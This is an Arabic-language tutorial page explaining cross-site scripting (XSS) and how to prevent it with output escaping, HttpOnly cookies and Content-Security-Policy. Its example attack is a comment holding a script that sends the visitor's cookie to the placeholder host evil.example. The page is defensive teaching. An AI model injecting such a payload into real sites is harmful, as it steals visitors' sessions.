شبكة تعلم مع ناو

ما هو هجوم XSS؟

XSS (Cross-Site Scripting) هجوم يحقن كودًا ضارًا، عادةً JavaScript، في صفحة موقع، فيُنفَّذ في متصفحات الزوار.

كيف يحدث؟

موقع يعرض التعليقات كما هي. يكتب المهاجم تعليقًا:

<script>fetch('https://evil.example/?c=' + document.cookie)</script>

كل من يفتح الصفحة يُنفَّذ عنده الكود، وقد تُسرق جلسته.

الحماية

  • تهريب المخرجات قبل عرضها، فتظهر كنص لا ككود:
echo htmlspecialchars($comment);   // PHP
echo esc_html($comment);           // WordPress
  • كوكيز الجلسة بخاصية HttpOnly، فلا تستطيع JavaScript قراءتها.
  • سياسة أمان المحتوى (Content-Security-Policy).

اختبر نفسك

خمسة أسئلة سريعة، مع الإجابة والشرح بعد كل سؤال.